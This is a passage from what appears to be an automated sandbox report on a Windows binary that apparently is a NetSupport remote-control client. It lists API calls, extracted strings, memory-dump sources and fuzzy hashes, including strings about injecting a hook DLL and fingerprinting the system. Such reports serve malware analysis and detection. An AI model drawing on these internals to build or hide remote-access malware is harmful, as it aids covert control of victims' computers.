                                                                                          • API ID: CloseHandle$EventObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 2857295742-0
                                                                                          • Opcode ID: e10994a41b1bc68cd7db5bfed52baceb2776918e92488011b02ba0e58eb1fabe
                                                                                          • Instruction ID: c20fb33e2b980743f2ac3e2106bbfbd817d664b238f0a6b2ac1f9d3b8763b474
                                                                                          • Opcode Fuzzy Hash: e10994a41b1bc68cd7db5bfed52baceb2776918e92488011b02ba0e58eb1fabe
                                                                                          • Instruction Fuzzy Hash: 67F04935500B169FD7108BD8DC84F96BBADFB84764F19602AE515E3190EB74ECC1CBA0
                                                                                          Function 005D6179 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 005D6230
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID: C:\Windows\Installer\$NSW.LIC$longpath=%s
                                                                                          • API String ID: 1611563598-2863773485
                                                                                          • Opcode ID: c01f3ecaae709c0c15785aef97713fefd2673607d0789690fad7dcfe9f547af6
                                                                                          • Instruction ID: eef300e5006d06a065afe3638e4e274a0ea0cc7c78b6a6e293284c7591a51c8a
                                                                                          • Opcode Fuzzy Hash: c01f3ecaae709c0c15785aef97713fefd2673607d0789690fad7dcfe9f547af6
                                                                                          • Instruction Fuzzy Hash: 3231D4399003029ACB306F6C9C277763BA2FF51365F580467F8069B3A1F7788A42C791
                                                                                          Function 005C5120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 005C513C
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSIF373.tmp,00000104), ref: 005C515A
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSIF373.tmp,000000FF,?,00000104,006199F4,00000000), ref: 005C51E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharCurrentFileModuleMultiNameProcessWide
                                                                                          • String ID: C:\Windows\Installer\MSIF373.tmp
                                                                                          • API String ID: 3257813942-2592894044
                                                                                          • Opcode ID: a26b4123fb3cb30297819a9ebf56a4c52e3cc2b773ea8d1904cc9bf825dcf7bf
                                                                                          • Instruction ID: 812d30108708d009b883964bc571f7e3e5ee45acbd61bba3b3c42643782b5cad
                                                                                          • Opcode Fuzzy Hash: a26b4123fb3cb30297819a9ebf56a4c52e3cc2b773ea8d1904cc9bf825dcf7bf
                                                                                          • Instruction Fuzzy Hash: A131B0746406059FDB24DFA4AC49FAA3BE6BF54314F04205DE545972D0EFB0A880CB90
                                                                                          Function 005EC045 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,client32u.ini,?,005EC0D4,?,005BEA14), ref: 005EC078
                                                                                          • GetLastError.KERNEL32(?,005EC0D4,?,005BEA14), ref: 005EC083
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AttributesErrorFileLast
                                                                                          • String ID: client32u.ini
                                                                                          • API String ID: 1799206407-403288815
                                                                                          • Opcode ID: 70ae28e57c8e60a268a7df5b6e1297931abd687806b92ce7f127e96c6944cd42
                                                                                          • Instruction ID: 20f63b25df67e2edf5caf29fc858e2e0c11c8ad8da4161d9a2f467562bbc7cc5
                                                                                          • Opcode Fuzzy Hash: 70ae28e57c8e60a268a7df5b6e1297931abd687806b92ce7f127e96c6944cd42
                                                                                          • Instruction Fuzzy Hash: FD014F315002D5DADB296F76880EB9D3F56BF41324F108502F8E58B5A1CB34C9438BA2
                                                                                          Function 005ED366 Relevance: 4.6, APIs: 3, Instructions: 98memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStartupInfoW.KERNEL32(?,00633048,00000058), ref: 005ED376
                                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 005ED38B
                                                                                          • GetCommandLineW.KERNEL32 ref: 005ED415
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CommandHeapInfoInformationLineStartup
                                                                                          • String ID:
                                                                                          • API String ID: 4259286974-0
                                                                                          • Opcode ID: dd3d68d72a1a707796ff03ca1605b47eee88eaf8f77e848f8d25ba1b9561c546
                                                                                          • Instruction ID: b39fbba99c9423edf593ea390bd24100f158f54228ea154f7d3aeeccfaf806ff
                                                                                          • Opcode Fuzzy Hash: dd3d68d72a1a707796ff03ca1605b47eee88eaf8f77e848f8d25ba1b9561c546
                                                                                          • Instruction Fuzzy Hash: C131C6709003999ADF2C7B73994E7AE3E74BF54B01F104816F5D89A0D2EBB4C9809B72
                                                                                          Function 00617F20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005B97D0: wsprintfW.USER32 ref: 005B9804
                                                                                          • LoadLibraryW.KERNELBASE(psapi.dll,?,0062F7C0,?), ref: 00617FA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoadwsprintf
                                                                                          • String ID: psapi.dll
                                                                                          • API String ID: 2341783205-80456845
                                                                                          • Opcode ID: fdb305fce30d3d0b15712c216bd9224c35c2fa6dd67ac070e326f220d1a6eff8
                                                                                          • Instruction ID: c71772fd81da9c022eeff05185a71c62a4b195e409e73ea16bdc983e1bb5fe5e
                                                                                          • Opcode Fuzzy Hash: fdb305fce30d3d0b15712c216bd9224c35c2fa6dd67ac070e326f220d1a6eff8
                                                                                          • Instruction Fuzzy Hash: DE115BB89013078FC344DFA9EC55A9A3BF2BB09700B64516AF408D7361EB709640CBA1
                                                                                          Function 005ED09C Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?,?,005E4C9F,?,?,?,?,?), ref: 005ED0A4
                                                                                          • GetLastError.KERNEL32(?,005E4C9F,?,?,?,?,?), ref: 005ED0AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2018770650-0
                                                                                          • Opcode ID: 2f2f9ca4fb1c1879640be6df603d47b92ba2f481149e36ccbfe45e6269354a2e
                                                                                          • Instruction ID: ca93c08b260624cadb949cc838743cb719fb7f57fcd3fb1fa55b0d59a081c70e
                                                                                          • Opcode Fuzzy Hash: 2f2f9ca4fb1c1879640be6df603d47b92ba2f481149e36ccbfe45e6269354a2e
                                                                                          • Instruction Fuzzy Hash: 3DD05E321585896B8F185BB7AC0C8563FAEAB80371B589621F46CC91E0FE31C8029471
                                                                                          Function 005E7CA4 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                            • Part of subcall function 005EF21F: GetModuleFileNameW.KERNEL32(00000000,006428CA,00000104,00000001,?,00000000), ref: 005EF2BB
                                                                                            • Part of subcall function 005EC94C: ExitProcess.KERNEL32 ref: 005EC95D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1715456479-0
                                                                                          • Opcode ID: 372cccd2e678008c2b2a17101be3f7b77160f35c08362822fd41eaf13b86a202
                                                                                          • Instruction ID: e563bb4eb2f109e286befbcf1e811b1d42782d13c1d03b91d919951d7a53f9ca
                                                                                          • Opcode Fuzzy Hash: 372cccd2e678008c2b2a17101be3f7b77160f35c08362822fd41eaf13b86a202
                                                                                          • Instruction Fuzzy Hash: E101B5362483CB9AD7193777AC46F3A3E8AFF89764F300836F19489591CE708C418260
                                                                                          Function 005EE97D Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,005ED3DF), ref: 005EE986
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 10892065-0
                                                                                          • Opcode ID: 4ba27d5c1c6ebf804e79270bac81a3d77aeb8e64a9f3620d4b3ea79f1dbdfceb
                                                                                          • Instruction ID: 46258637d40c551d6beb6583df2c18aabf1c32170f1ecd96779a04c781df936d
                                                                                          • Opcode Fuzzy Hash: 4ba27d5c1c6ebf804e79270bac81a3d77aeb8e64a9f3620d4b3ea79f1dbdfceb
                                                                                          • Instruction Fuzzy Hash: E9C09B747413025BEB585B345C2775935D5570D742F6450297107D95D0D7B054505614
                                                                                          Function 005EC94C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005EC921: GetModuleHandleW.KERNEL32(mscoree.dll,?,005EC959,?,?,005F925A,000000FF,0000001E,006336B0,0000000C,005F9305,?,?,?,005F2AA8,0000000D), ref: 005EC92B
                                                                                            • Part of subcall function 005EC921: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005EC93B
                                                                                          • ExitProcess.KERNEL32 ref: 005EC95D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressExitHandleModuleProcProcess
                                                                                          • String ID:
                                                                                          • API String ID: 75539706-0
                                                                                          • Opcode ID: 0879c062ac785a2663836eb883ce523f4331627928ee38ed24ab415784638c74
                                                                                          • Instruction ID: 8e71abee4b24a48fa03a66139d70a5acd00a680b22499fab3aa978f59aafb666
                                                                                          • Opcode Fuzzy Hash: 0879c062ac785a2663836eb883ce523f4331627928ee38ed24ab415784638c74
                                                                                          • Instruction Fuzzy Hash: AAB09B310041487BCB052F52DC0D8893F16EB807607545011F45545071DF71ED9395D1
                                                                                          Function 00618300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(772F0000), ref: 0061830A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 2029f8eb57b27f3ce33640f88e6c83a570aacb6ba579b105510e74eec3fe65fc
                                                                                          • Instruction ID: 0b70a949b88f02878c84e2319d97506fa66b7f7efde57ecb3ce01467f5e985c2
                                                                                          • Opcode Fuzzy Hash: 2029f8eb57b27f3ce33640f88e6c83a570aacb6ba579b105510e74eec3fe65fc
                                                                                          • Instruction Fuzzy Hash: 12B012707001024B8F008F629D6C686366AA700F0030C54047010C3050CA20D500C930

                                                                                          Non-executed Functions

                                                                                          Function 005E03E0 Relevance: 123.0, APIs: 49, Strings: 21, Instructions: 510libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000080), ref: 005E0411
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • GetModuleHandleW.KERNEL32(user32.dll,GetWindowBand), ref: 005E0437
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005E043E
                                                                                          • SHGetFolderPathW.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 005E049B
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E0547
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005E0560
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E059B
                                                                                          • GetProcAddress.KERNEL32(?,MySetHook), ref: 005E05CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadModuleNameProcwsprintf$ClassFileFolderHandleLocalPathTimewvsprintf
                                                                                          • String ID: Found SM, SimulateWinKey (to dismiss)$GetWindowBand$HookForBlank(%x, %s, %x)$Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Shell_TrayWnd$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$WaitSM$\NSL\$band=2$bound$nothing to do$user32.dll$winsthooks.dll
                                                                                          • API String ID: 1466273555-315793285
                                                                                          • Opcode ID: d950bcf28b3211c4b52656db61afe57d4e2687017c0da3324c41df870e3c5753
                                                                                          • Instruction ID: e7a5a754cd7843564ab34e678befdfee4a7b0627ab99b89681bcadeb5bca8b4f
                                                                                          • Opcode Fuzzy Hash: d950bcf28b3211c4b52656db61afe57d4e2687017c0da3324c41df870e3c5753
                                                                                          • Instruction Fuzzy Hash: C61239B1D003699BDB349B65DC49BEA7B79BF40704F085095E64AA71C2EBB09DC0CF61
                                                                                          Function 005CA860 Relevance: 103.6, APIs: 8, Strings: 51, Instructions: 361libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 005CA8D5
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 005CA900
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005CA909
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetProductInfo,Microsoft ), ref: 005CAA1F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005CAA22
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc$Version
                                                                                          • String ID: (build %d)$, 32-bit$, 64-bit$Advanced Server$Business Edition$Cluster Server Edition$Compute Cluster Edition$Datacenter Edition$Datacenter Edition (core installation)$Datacenter Edition for Itanium-based Systems$Datacenter Server$Datacenter x64 Edition$Enterprise Edition$Enterprise Edition (core installation)$Enterprise Edition for Itanium-based Systems$Enterprise x64 Edition$GetNativeSystemInfo$GetProductInfo$Home Basic Edition$Home Edition$Home Premium Edition$Microsoft $Professional$Server$Small Business Server$Small Business Server Premium Edition$Standard Edition$Standard Edition (core installation)$Standard x64 Edition$Starter Edition$Ultimate Edition$Web Edition$Web Server Edition$Windows 10 $Windows 2000 $Windows 7 $Windows 8 $Windows 8.1 $Windows Home Server$Windows Server 2003 R2, $Windows Server 2003, $Windows Server 2008 $Windows Server 2008 R2 $Windows Server 2012 $Windows Server 2012 R2 $Windows Server 2016 $Windows Storage Server 2003$Windows Vista $Windows XP $Windows XP Professional x64 Edition$kernel32.dll
                                                                                          • API String ID: 1459689528-3593436524
                                                                                          • Opcode ID: d015dbc739a54bd540d9ab1afc18e28e4f90abb11c70a1db2f903551f50d18ff
                                                                                          • Instruction ID: c39e49a319b53748fd9480b8612d649016afb84ab5a806155bcd23048338f45e
                                                                                          • Opcode Fuzzy Hash: d015dbc739a54bd540d9ab1afc18e28e4f90abb11c70a1db2f903551f50d18ff
                                                                                          • Instruction Fuzzy Hash: 00C1E630B4876CAEDF3086909E06FF97E62BB51B0CF15449EE44A66182CAB45DC1DF53
                                                                                          Function 005B0130 Relevance: 102.3, APIs: 35, Strings: 23, Instructions: 769windowthreadtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,?,005B0BEF,?,005B9820,?,00000000,?,005B0C46,?,005B9820,?,00000000), ref: 005B015C
                                                                                          • GetTickCount.KERNEL32 ref: 005B01D9
                                                                                          • GetTickCount.KERNEL32 ref: 005B0204
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005B0228
                                                                                          • TranslateMessage.USER32(?), ref: 005B0231
                                                                                          • DispatchMessageW.USER32(?), ref: 005B023A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B0267
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B026A
                                                                                          • wsprintfW.USER32 ref: 005B027F
                                                                                          • wsprintfW.USER32 ref: 005B02AE
                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B02CF
                                                                                          • GetProcessTimes.KERNEL32(00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B02D6
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B02EB
                                                                                          • wsprintfW.USER32 ref: 005B0395
                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0430
                                                                                          • GetGuiResources.USER32(00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0437
                                                                                          • wsprintfW.USER32 ref: 005B046D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B0494
                                                                                          • wsprintfW.USER32 ref: 005B04A3
                                                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,?,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B04AF
                                                                                          • wsprintfW.USER32 ref: 005B04F7
                                                                                          • wsprintfW.USER32 ref: 005B0553
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,005B9820,?,..\CTL32\Refcount.cpp), ref: 005B0566
                                                                                          • wsprintfW.USER32 ref: 005B0602
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
